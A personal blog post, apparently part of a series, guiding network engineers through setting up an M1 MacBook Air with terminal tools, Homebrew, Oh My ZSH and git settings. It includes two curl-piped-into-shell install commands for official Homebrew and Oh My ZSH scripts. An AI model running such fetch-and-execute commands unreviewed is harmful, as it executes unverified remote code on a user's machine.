<pre> </pre><pre><h3 id="iterm2" style="text-align: left;">Iterm2</h3><pre><b>Installation</b></pre>Download here: <a href="https://iterm2.com/downloads.html">Iterm2</a></pre><pre><ul style="text-align: left;"><li>Open the zip file.</li><li>select "Automatically update".</li><li>move app to applications.</li><li>In Applications, select iTerm, right click, get info, Check "Open in Rosetta".</li></ul></pre><div style="text-align: left;">Iterm2 is a great terminal emulator. It has so many features you will have to read the documentation at:</div><pre><a href="https://iterm2.com/documentation.html">iterm2 documentation</a><br /></pre><pre><br /></pre><pre><h3 id="onyx" style="text-align: left;">Onyx</h3><pre>Operating system utilities for macOS</pre><a href="https://www.titanium-software.fr/en/applications.html">Onyx Download</a>
</pre><pre>OnyX is a multifunction utility that you can use to verify the structure of the
system files, to run miscellaneous maintenance and cleaning tasks, to
configure parameters in the Finder, Dock, Safari, and some Apple applications,
to delete caches, to remove certain problematic folders and files,
to rebuild various databases and indexes, and more.</pre><pre>Download the package, move to the application folder</pre><pre><br /></pre><pre><br /></pre><h3 id="ticker" style="text-align: left;">Ticker</h3><pre>Ticker - Stock ticker for the command line
<a href="https://github.com/achannarasappa/ticker">Ticker Github page</a>
<b>Features</b>
Live stock price quotes
Track value of your stock positions
Support for multiple cost basis lots
Support for pre and post market price quotes</pre><pre><br /></pre><div style="text-align: left;">Ok, this isn't network engineering related in anyway but you should be investing in the stock market.<br />Ticker is a fun little terminal app that lets you monitor stocks.</div><pre><br /></pre><pre><b>Installation</b>
brew install achannarasappa/tap/ticker</pre><p style="text-align: left;">Ticker uses ~/.ticker.yaml for configuration. Below is the default yaml file. Put stock symbols<br />in the watchlist area to watch them.</p><p style="text-align: left;"><br />If you own stocks, put them in the Lots area. It's pretty self explanatory. Put the stock symbol<br /> after symbol:, the quantity you own after quantity and the purchase cost after unit_cost.</p><pre>Then open a terminal and type ticker [enter]</pre><pre> <br />
<!--HTML generated using hilite.me--><div style="background: rgb(240, 240, 240); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #60a0b0; font-style: italic;"># ~/.ticker.yaml</span>
show<span style="color: #666666;">-</span>summary: true
show<span style="color: #666666;">-</span>tags: true
show<span style="color: #666666;">-</span>fundamentals: true
show<span style="color: #666666;">-</span>separator: true
show<span style="color: #666666;">-</span>holdings: true
interval: <span style="color: #40a070;">5</span>
currency: USD
watchlist:
<span style="color: #666666;">-</span> NET
<span style="color: #666666;">-</span> TEAM
<span style="color: #666666;">-</span> ESTC
<span style="color: #666666;">-</span> BTC<span style="color: #666666;">-</span>USD
lots:
<span style="color: #666666;">-</span> symbol: <span style="color: #4070a0;">"ABNB"</span>
quantity: <span style="color: #40a070;">35.0</span>
unit_cost: <span style="color: #40a070;">146.00</span>
<span style="color: #666666;">-</span> symbol: <span style="color: #4070a0;">"ARKW"</span>
quantity: <span style="color: #40a070;">20.0</span>
unit_cost: <span style="color: #40a070;">152.25</span>
<span style="color: #666666;">-</span> symbol: <span style="color: #4070a0;">"ARKW"</span>
quantity: <span style="color: #40a070;">20.0</span>
unit_cost: <span style="color: #40a070;">145.35</span>
</pre></div>
</pre><pre><br /></pre><pre><br /></pre><pre><br /></pre><div><br /></div><pre><br /></pre><pre><br /></pre><pre><br /></pre><pre><br /></pre><pre><br /></pre><pre><br /></pre><p></p><p></p><p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge1WvXVNDpKZauh3uhbzzO7i3D_WLdeUwMfXjJkDkLKK-Qs7KYZBy_XViDfbIqjoPiMw31B_x_G_QWD3GeDduhrknehx4NFirsZ1zjZHXYlUhOMhywIrAtF-hBTcTQUsAASGuEfG83OJkg/s750/Screen+Shot+2021-04-30+at+22.13.58.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="498" data-original-width="750" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge1WvXVNDpKZauh3uhbzzO7i3D_WLdeUwMfXjJkDkLKK-Qs7KYZBy_XViDfbIqjoPiMw31B_x_G_QWD3GeDduhrknehx4NFirsZ1zjZHXYlUhOMhywIrAtF-hBTcTQUsAASGuEfG83OJkg/s320/Screen+Shot+2021-04-30+at+22.13.58.png" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY8588WtKzTk64hZu3et6oAW-9v2sODSGYsfE0RQR6QEIuv145Y4oCBS6u_-uretncIayJC-So3ptdFeS731K_4cQyeOZ2mr-Drzykwki5sc_KDnSq8y03HIqTi_c-ow_jjvJBJ0TxPh2s/s750/Screen+Shot+2021-04-30+at+22.13.58.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="498" data-original-width="750" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY8588WtKzTk64hZu3et6oAW-9v2sODSGYsfE0RQR6QEIuv145Y4oCBS6u_-uretncIayJC-So3ptdFeS731K_4cQyeOZ2mr-Drzykwki5sc_KDnSq8y03HIqTi_c-ow_jjvJBJ0TxPh2s/s320/Screen+Shot+2021-04-30+at+22.13.58.png" width="320" /></a></div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXC3SBJrc3xKqnI3mH_IKzc0SKE7PVmB1qQW2IOlp8HuHTGrSiKAbFh6-n7FqirJTHkk0JPtgw1a_JxLa9SJmH-QKl1HArGS3ZQsKNy30fym72Lln2O9vHbxH_R62sFsPSptcRXCotnwhP/s1006/Screen+Shot+2021-09-18+at+19.07.22.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="186" data-original-width="1006" height="59" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXC3SBJrc3xKqnI3mH_IKzc0SKE7PVmB1qQW2IOlp8HuHTGrSiKAbFh6-n7FqirJTHkk0JPtgw1a_JxLa9SJmH-QKl1HArGS3ZQsKNy30fym72Lln2O9vHbxH_R62sFsPSptcRXCotnwhP/s320/Screen+Shot+2021-09-18+at+19.07.22.png" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJMedGHyhXDIuPHDFB2dyF0cstWcHYD6oGbEq_xaYvkKzKtzzQV2aOKlNH1suReU0TdCnLfKBvvZgPRDzZokx6ReZ4fUZQKerG2GgdckSfRN56Jqs-Euy3Zc7O_WIiI6ixrPaW-1uxfUtR/s1006/Screen+Shot+2021-09-18+at+19.07.22.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="186" data-original-width="1006" height="59" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJMedGHyhXDIuPHDFB2dyF0cstWcHYD6oGbEq_xaYvkKzKtzzQV2aOKlNH1suReU0TdCnLfKBvvZgPRDzZokx6ReZ4fUZQKerG2GgdckSfRN56Jqs-Euy3Zc7O_WIiI6ixrPaW-1uxfUtR/s320/Screen+Shot+2021-09-18+at+19.07.22.png" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhue6zjKXucNy6dWGTJVorj3e-ueBgvdK7tgD4Nclx_B6qaR4kEmqpl702cyjIHgqWwTB4fBSGKmp9p_oDFh3R74xMd0_0fqJaWl4kUxLu6sv6b9B0Z_0NfgxZVVJxLwXwLG9UIFqsTHQsM/s1006/Screen+Shot+2021-09-18+at+19.07.22.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="186" data-original-width="1006" height="59" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhue6zjKXucNy6dWGTJVorj3e-ueBgvdK7tgD4Nclx_B6qaR4kEmqpl702cyjIHgqWwTB4fBSGKmp9p_oDFh3R74xMd0_0fqJaWl4kUxLu6sv6b9B0Z_0NfgxZVVJxLwXwLG9UIFqsTHQsM/s320/Screen+Shot+2021-09-18+at+19.07.22.png" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn2zJee1DyrimG8knoJQF6wu-mhn0nd79knjTrBE3ymgmuy_mjxQNrxc9lXSFQNZXZoQU5jol6RqJKFVyNTA1p6i3F3lhUTBtP_Cb-PCJsVw919DjLwFcCcvsG_YQHUS80FZJjKyUWYfFS/s1006/Screen+Shot+2021-09-18+at+19.07.22.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="186" data-original-width="1006" height="59" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn2zJee1DyrimG8knoJQF6wu-mhn0nd79knjTrBE3ymgmuy_mjxQNrxc9lXSFQNZXZoQU5jol6RqJKFVyNTA1p6i3F3lhUTBtP_Cb-PCJsVw919DjLwFcCcvsG_YQHUS80FZJjKyUWYfFS/s320/Screen+Shot+2021-09-18+at+19.07.22.png" width="320" /></a></div><br /><p></p><p></p></div>@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com2tag:blogger.com,1999:blog-690329124282786689.post-19541057042342759072021-03-15T16:01:00.098-07:002023-04-09T11:31:05.398-07:00Apple MacBook Air M1 for Network Engineers Part 2<p>Updated April, 9th, 2023</p><p>Now that we have the macOS interface set up, it's time to install some applications! </p><div style="text-align: left;">If you haven't read part 1, you can find it at the link below: <br /><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network.html">Apple MacBook Air M1 for Network Engineers Part 1</a></div><div style="text-align: left;"><br /></div><div style="text-align: left;">Part 3 is now published and can be found at the link below:<br /><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_77.html">Apple MacBook Air M1 for Network Engineers Part 3</a></div><div style="text-align: left;"><br /></div><div style="text-align: left;">Part 4 is now published and can be found at the link below:<br /><a href="https://mwhubbard.blogspot.com/2021/04/if-you-have-been-following-along-with.html#LACP">Apple MacBook Air M1 for Network Engineers Part 4</a></div><div style="text-align: left;"><br /></div><div style="text-align: left;">Part 5 is now published and can be found at the link below:<br /><a href="https://mwhubbard.blogspot.com/2021/05/apple-macbook-air-m1-for-network.html">Apple MacBook Air M1 for Network Engineers Part 5</a></div><h3 style="text-align: left;"><br /></h3><h3 style="text-align: left;">Cisco Devnet</h3><p>Cisco has jumped into network automation in a big way. Several of the tools in our list come from Cisco's <a href="https://developer.cisco.com/learning/modules/dev-setup">Developer Workstation and Environment Setup</a> webpage. This page has setup guides for Windows, Mac, and Linux. It does require a login. I used my CCO but it looks like you can use GitHub or Google also.</p><p>The exam requirements are listed <a href="https://developer.cisco.com/certification/exam-topic-associate/">here</a>. This page also has some good tutorials on it, well worth a look. They have moved the Developer Workstation links to this page.</p><p>If you can't log in, here is a similar site on GitHub that doesn't require a login:</p><p><a href="https://github.com/CiscoDevNet/netprog_basics/blob/master/readme_resources/workstation_setup.md">Developer Workstation and Environment Setup on GitHub</a><br /></p><p><a href="https://www.amazon.com/Certified-DevNet-Associate-200-901-Official/dp/0136642969">DevNet Certification Guide</a><br /></p><p>I am working on the DevNet certification. I have documented most of the journey <a href="https://github.com/rikosintie/DevNetAssoc">here</a></p><h4 style="text-align: left;"><b>A terminal for Intel specific apps</b></h4><p>Since this is a tutorial for the new M1 Apple silicon, we will set up a terminal using Rosetta2 so that any terminal apps that fail to run because of the ARM architecture can be used in an emulated Intel terminal.</p><p>I got this one from the Mac Geek Gab podcast. </p><p></p><ul style="text-align: left;"><li>Open Finder, expand the Utilities folder, right-click on "Terminal" and select duplicate.</li><li>Rename the new shortcut to "Terminal-Intel" or something you like.</li><li>Right-click, select Get Info, check Open Using Rosetta.</li></ul><p></p><p>Now all Intel-based terminal apps should work.</p><p><br /></p><h4 style="text-align: left;">Adding your SSH keys to GitHub</h4><p>Here is the github.com documentation for creating and adding your SSH keys to github.com. </p><div style="text-align: left;"><a href="https://docs.github.com/en/authentication/connecting-to-github-with-ssh/generating-a-new-ssh-key-and-adding-it-to-the-ssh-agent">Connecting to GitHub with SSH<br /></a><a href="https://docs.github.com/en/authentication/connecting-to-github-with-ssh/generating-a-new-ssh-key-and-adding-it-to-the-ssh-agent">Generating a new SSH key and adding it to the ssh-agent</a></div><p>I used this YouTube tutorial to learn how to set up git to push my local repositories up to GitHub.com</p><p><a href="https://www.youtube.com/watch?v=RGOj5yH7evk">Git and GitHub for Beginners - Crash Course</a><br /></p><p><br /></p><p>Here is a list of the apps that we will be installing:</p><p></p><ul style="text-align: left;"><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html#simple">Simplenote - Note-taking app</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html#termius">Termius - SSH Client</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html#xcode">Xcode - The Apple Developer Tools</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html#diff-so-fancy">Git and diff-so-fancy</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html#serial">Serial - A serial tool</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html#homebrew">Homebrew - Similar to apt for Linux</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html#omz">Oh My ZSH - a great add on for the zsh shell</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html#opencommand">The open command in terminal</a><br /></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html#VSCode">VS Code</a> - Microsoft's Open Source IDE</li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html#powershell">Powershell - Microsoft Open Sourced it</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html#autojump">Autojump - A faster way to navigate the file system</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html#nodejs">NodeJS</a> - Required for Cisco's DevNet program</li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html#postman">Postman - A tool for working with RESTful APIs</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html#ngrok">Ngrok</a> - Required for Cisco's DevNet program</li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html#chrome">Google Chrome - A Universal App now</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html#open">Open Connect - Open Source VPN client used to connect to Cisco DevNet labs</a></li><li><a href="https://mwhubbard.blogspot.com/2021/03/apple-macbook-air-m1-for-network_15.html#minicom">Minicom</a> - A terminal app that allows you to connect to USB to Serial cables</li></ul><p></p><p><br /></p><h3 id="simple" style="text-align: left;">Simplenote</h3><p>This is a free (for now anyway) note-taking app from Automatic. It's available for Mac, IOS, Linux, Windows, and Android so it fits my work life perfectly since I use all of those operating systems. It syncs to the cloud using the Automatic servers. Automatic is the company behind WordPress so they know cloud!</p><p>Simplenote supports MarkDown so if you are going down the developer path you can sharpen your MD skills in Simplenote. It supports "Tags" which allows you to categorize notes. Not as good as Evernote notebooks but it's free and works for me.</p><p>Open the Mac App Store, search for Simplenote and install.</p><p><br /></p><h3 id="termius" style="text-align: left;">Termius - SSH Client</h3><p>Termius isn't a mere SSH client, it's a complete command-line solution. Securely access Linux or IoT devices from your Android or iOS mobile device, as well as any Windows, macOS, or Linux computer. It is Mosh-compatible, providing excellent reliability on high-latency constantly changing connections.</p><p>Again, a tool that works on every platform! I got in on Termius during the beta and it was only $5.99 a year which was well worth it. The devices you create sync across all platforms so no matter what device you grab, it has all your hosts on it.</p><p>But the cost has gone up to $8.99 per month. You can do a trial to see if you like it. </p><p>Open the Mac App Store, search for Termius and install.</p><h3 id="xcode" style="text-align: left;">Xcode</h3><p>This is a huge application, 11.6GB! But if you want to use iPerf3 and many other terminal apps you need it. It is the tool used to write MacOS and IOS apps if you want to try your hand at that. </p><p>Installation</p><p>Open the Mac App store, search for xcode and install.</p><p><br /></p><h3 id="diff-so-fancy" style="text-align: left;">Git and diff-so-fancy</h3><p>Xcode includes git. After Xcode is installed you can run: </p><p>git --version</p><p>to check what version of git is installed</p><p>xcode also installs python 3.x.</p><div style="text-align: left;"><br /></div><div style="text-align: left;">diff-so-fancy is an addition to git. It also works with the built in "diff" command. It adds better coloring and other features to the "git diff" command.</div><div style="text-align: left;"><br /></div><h4 style="text-align: left;">Installation</h4><div style="text-align: left;"><br /></div><div style="text-align: left;"><b>brew install diff-so-fancy</b></div><div style="text-align: left;"><br /></div><div style="text-align: left;">Once diff-so-fancy is installed enter the following commands in the terminal:</div><div style="text-align: left;"><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">Configure git to use diff<span style="color: #555555;">-</span>so<span style="color: #555555;">-</span>fancy <span style="color: #006699; font-weight: bold;">for</span> all diff output<span style="color: #555555;">:</span>
git config <span style="color: #555555;">--</span>global core.pager <span style="color: #cc3300;">"diff-so-fancy | less --tabs=4 -RFX"</span>
git config <span style="color: #555555;">--</span>global interactive.diffFilter <span style="color: #cc3300;">"diff-so-fancy --patch"</span>
</pre></div>
<div style="text-align: left;"><br /></div><div style="text-align: left;">Improved colors for the highlighted bits</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Enter the following commands in the terminal to set the colors:</div><div style="text-align: left;"><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">git config <span style="color: #555555;">--</span>global color.ui <span style="color: #336666;">true</span>
git config <span style="color: #555555;">--</span>global color.diff<span style="color: #555555;">-</span>highlight.oldNormal <span style="color: #cc3300;">"red bold"</span>
git config <span style="color: #555555;">--</span>global color.diff<span style="color: #555555;">-</span>highlight.oldHighlight <span style="color: #cc3300;">"red bold 52"</span>
git config <span style="color: #555555;">--</span>global color.diff<span style="color: #555555;">-</span>highlight.newNormal <span style="color: #cc3300;">"green bold"</span>
git config <span style="color: #555555;">--</span>global color.diff<span style="color: #555555;">-</span>highlight.newHighlight <span style="color: #cc3300;">"green bold 22"</span>
git config <span style="color: #555555;">--</span>global color.diff.meta <span style="color: #cc3300;">"11"</span>
git config <span style="color: #555555;">--</span>global color.diff.frag <span style="color: #cc3300;">"magenta bold"</span>
git config <span style="color: #555555;">--</span>global color.diff.func <span style="color: #cc3300;">"146 bold"</span>
git config <span style="color: #555555;">--</span>global color.diff.commit <span style="color: #cc3300;">"yellow bold"</span>
git config <span style="color: #555555;">--</span>global color.diff.old <span style="color: #cc3300;">"red bold"</span>
git config <span style="color: #555555;">--</span>global color.diff.new <span style="color: #cc3300;">"green bold"</span>
git config <span style="color: #555555;">--</span>global color.diff.whitespace <span style="color: #cc3300;">"red reverse"</span>
</pre></div>
<div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;">To use diff-so-fancy with the built in diff command:</div><div style="text-align: left;"><br /></div><div style="text-align: left;"><b>diff -u file-a file-b | diff-so-fancy</b></div><div style="text-align: left;"><b><br /></b></div><h4 style="text-align: left;"><b>Reference</b></h4><div style="text-align: left;"><b><a href="https://github.com/so-fancy/diff-so-fancy">diff-so-fancy</a><br /></b></div><div style="text-align: left;"><br /></div><h3 id="serial" style="text-align: left;">Serial</h3><p>Published by Decisive Tactics.</p><p>Connect to routers, servers, firewalls, industrial control and IoT devices with ease. Serial includes built-in, reliable support for almost every serial device on the market, sparing you the hassle of finding, installing, and updating drivers.</p><p><a href="https://www.decisivetactics.com/support/view?article=compatible-devices">Supported chipsets</a><br /></p><p>This app is $39.99 on the Mac App Store. I was reluctant to spend that much on a serial app but a co-worker highly recommended it. Now that I have used it I agree! The built-in driver support is great. I haven't connected any USB to Serial cable that didn't just work. And, the app pops a connect dialog up as soon as you connect the USB. Very nice.</p><p>Version 2 has SSH support also. I haven't used it yet because I have so many devices in Termius and it runs on all my platforms. But if you don't want to pay the subscription to Terminus, Serial might be a good alternative.</p><p>Open the Mac App store, search for serial and install.</p><p><br /></p><h3 id="homebrew" style="text-align: left;">Homebrew</h3><p>Homebrew provides access to many standard applications and packages but isn't optimized for large binary-based applications. As an extension to brew, cask is available for installing GUI applications. To list any available casks, you would use the --cask or --casks option with the brew list command. Use the --help option on brew commands to learn more:</p><p> <b>brew list --help</b></p><p><b>Installation</b></p><p>Start the Terminal-Intel and paste the following:</p><p>/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"</p><p></p><ul style="text-align: left;"><li><b>brew help</b> to get started</li><li><b>brew -v</b> to check the version</li></ul><p></p><p><b>Show installed packages</b></p>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="background-color: #ffaaaa; color: #aa0000;">┌─</span>[mhubbard<span style="color: #9999ff;">@HP8600</span><span style="color: #555555;">-</span><span style="color: #ff6600;">4</span>] <span style="color: #555555;">-</span> [<span style="color: #555555;">/</span>private<span style="color: #555555;">/</span>tftpboot] <span style="color: #555555;">-</span> [<span style="color: #ff6600;">2885</span>]
<span style="background-color: #ffaaaa; color: #aa0000;">└─</span>[<span style="background-color: #ffaaaa; color: #aa0000;">$</span>] brew <span style="color: #336666;">list</span> [<span style="color: #ff6600;">18</span>:<span style="color: #ff6600;">33</span>:<span style="color: #ff6600;">19</span>]
<span style="color: #555555;">==></span> Formulae
arp<span style="color: #555555;">-</span>scan cdpr iproute2mac libuv nghttp2 socat watch
arping cheat jemalloc lldpd node speedtest<span style="color: #555555;">-</span>cli xz
asciinema duf lft lsusb openssl<span style="color: #9999ff;">@1</span><span style="color: #555555;">.</span><span style="color: #ff6600;">1</span> sqlite yadm
autojump exa libev minicom pcre2 tcl<span style="color: #555555;">-</span>tk
bat gdbm libevent mpdecimal python<span style="color: #9999ff;">@3</span><span style="color: #555555;">.</span><span style="color: #ff6600;">9</span> tcptraceroute
brotli icu4c libnet mtr readline ticker
c<span style="color: #555555;">-</span>ares iperf3 libpcap ncurses sipcalc ugrep
<span style="color: #555555;">==></span> Casks
font<span style="color: #555555;">-</span>inconsolata<span style="color: #555555;">-</span>nerd<span style="color: #555555;">-</span>font ngrok unofficial<span style="color: #555555;">-</span>wineskin
google<span style="color: #555555;">-</span>chrome openconnect<span style="color: #555555;">-</span>gui
mark<span style="color: #555555;">-</span>text powershell
</pre></div>
<p>Further documentation: </p><p></p><ul style="text-align: left;"><li> <a href="https://docs.brew.sh">Brew Documentation</a></li><li> <a href="https://opensource.com/article/20/6/homebrew-mac">Introduction to Homebrew: The painless way to install anything on a Mac</a></li></ul><p></p>
<p><br /></p><h3 id="omz" style="text-align: left;">Oh My ZSH</h3><p>macOS Big Sur uses zsh as the shell. Oh my zsh is an add-on that provides many additional features. You can read up on OMZ on their <a href="https://ohmyz.sh/">website</a>. From the GitHub readme</p><p>A delightful community-driven (with 1800+ contributors) framework for managing your zsh configuration. Includes nearly 300 optional plugins (rails, git, OSX, hub, docker, homebrew, node, php, python, etc), over 140 themes to spice up your morning, and an auto-update tool so that makes it easy to keep up with the latest updates from the community.</p><p>This is a free, open-source project. If you find OMZ useful, please make a donation to the project.</p><p>I found this guy's blog and it has some useful tips for OMZ </p><p>https://github.com/AidanGlickman/Dotfiles-Mac/blob/master/terminal/.zshrc</p><p>The link is to his .zshrc file. I took quite a bit out of his config to help me get started. </p><h4 style="text-align: left;"><b>Installation</b></h4><p>By default, macOS doesn't create a configuration file for zsh. Before installing Oh My ZSH create one using</p><p>nano ~/.zshrc</p><p>Add </p><p>ZSH_DISABLE_COMPFIX=true </p><p>as the first line of ~/.zshrc file. This prevents a security notice on Mac. There isn't a Security issue, it's a false alert, but you can't continue the install until you do this. I had a little "Chicken and egg" issue. I added the line but Oh My ZSH overwrote the .zshrc file. I added it back in, reran the curl command and then it worked.</p><p>I'm coming from Ubuntu and BASH. I didn't think I would like zsh but with Oh My ZSH I am sold. I plan to install zsh with Oh My ZSH on my Unbuntu box I like it so much.</p><p>Now run the following shell script. NOTE: Normally it's not smart to run a shell script with curl from the Internet but you can review the script on the Oh My ZSH GitHub before running it.</p><p>sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"</p><p>Now OMZ should be installed and working. </p><p>Now we need to modify the .zshrc again.</p><h4 style="text-align: left;"><b>Edit the .zshrc file </b></h4><p>nano ~/.zshrc</p><p>Press ctrl+w to search in nano and search for plugins</p><p><b>set plugins to:</b></p><p>plugins=(git zsh-completions zsh-autosuggestions zsh-syntax-highlighting)</p><p><b>Download the plugins</b></p><p>Look at the git clone, notice that it clones into your .oh-my-zsh/custom directory.</p><p></p>
<!--HTML generated using hilite.me--><div style="background-color: #111111; background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">git</span> <span style="color: white;">clone</span> <span style="color: white;">https://github.com/zsh-users/zsh-completions</span> <span style="color: white;">${ZSH_CUSTOM:=~/.oh-my-zsh/custom}/plugins/zsh-completions</span>
<span style="color: white;">git</span> <span style="color: white;">clone</span> <span style="color: white;">https://github.com/zsh-users/zsh-syntax-highlighting.git</span> <span style="color: white;">${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting</span>
<span style="color: white;">git</span> <span style="color: white;">clone</span> <span style="color: white;">https://github.com/zsh-users/zsh-autosuggestions</span> <span style="color: white;">${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-autosuggestions</span>
</pre></div>
<p></p><p><b><br /></b></p><p><b>Some Additional Plugins that I find useful</b></p><p><b>Colored-man-pages</b></p><p>This plugin is very simple, all it does is colorize your man pages. It doesn't require a separate download, just add it to the plugins section in .zshrc</p><p>Here is what it looks like in action:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkvzfYT5ECgGKvNyVCLbaIUP6vtBdJ1Y9xvCW30mACfzallupxwr3hrdifBXMvzA3uJfVqALHGfIEUEH9bl_VEx0PolRVfYs6XrwB1YWYSnJY15kc7kpMN2p9AG4e-cESV03PG2Xydm9R7/s2082/Screen+Shot+2021-09-19+at+20.10.30.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="886" data-original-width="2082" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkvzfYT5ECgGKvNyVCLbaIUP6vtBdJ1Y9xvCW30mACfzallupxwr3hrdifBXMvzA3uJfVqALHGfIEUEH9bl_VEx0PolRVfYs6XrwB1YWYSnJY15kc7kpMN2p9AG4e-cESV03PG2Xydm9R7/w484-h206/Screen+Shot+2021-09-19+at+20.10.30.png" width="484" /></a></div><br /><p><b>Aliases</b></p><p>Once you start creating aliases it's hard to remember all of them. Also, I didn't realize that the plugins create their own aliases.</p><p>This plugin simply lists all your aliases when you type acs. This one doesn't require a download either, just add it to the plugins section of .zshrc.</p><p>Here are a few lines output by aliases</p>
<!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌─[mhubbard@HP8600-</span><span style="color: #0086f7; font-weight: bold;">4</span><span style="color: white;">]</span> <span style="color: white;">-</span> <span style="color: white;">[/private/tftpboot]</span> <span style="color: white;">-</span> <span style="color: white;">[</span><span style="color: #0086f7; font-weight: bold;">3233</span><span style="color: white;">]</span>
<span style="color: white;">└─[$]</span> <span style="color: white;">acs</span> <span style="color: white;">[</span><span style="color: #0086f7; font-weight: bold;">20</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">14</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">27</span><span style="color: white;">]</span>
<span style="color: white;">[</span>\<span style="color: white;">gitk]</span>
<span style="color: white;">gk</span> <span style="color: white;">=</span> \<span style="color: white;">gitk</span> <span style="color: white;">--all</span> <span style="color: white;">--branches</span>
<span style="color: white;">gke</span> <span style="color: white;">=</span> \<span style="color: white;">gitk</span> <span style="color: white;">--all</span> <span style="color: white;">$(git</span> <span style="color: white;">log</span> <span style="color: white;">-g</span> <span style="color: white;">--pretty=%h)</span>
<span style="color: white;">[_default]</span>
<span style="color: white;">-</span> <span style="color: white;">=</span> <span style="color: white;">cd</span> <span style="color: white;">-</span>
<span style="color: white;">...</span> <span style="color: white;">=</span> <span style="color: white;">../..</span>
<span style="color: white;">....</span> <span style="color: white;">=</span> <span style="color: white;">../../..</span>
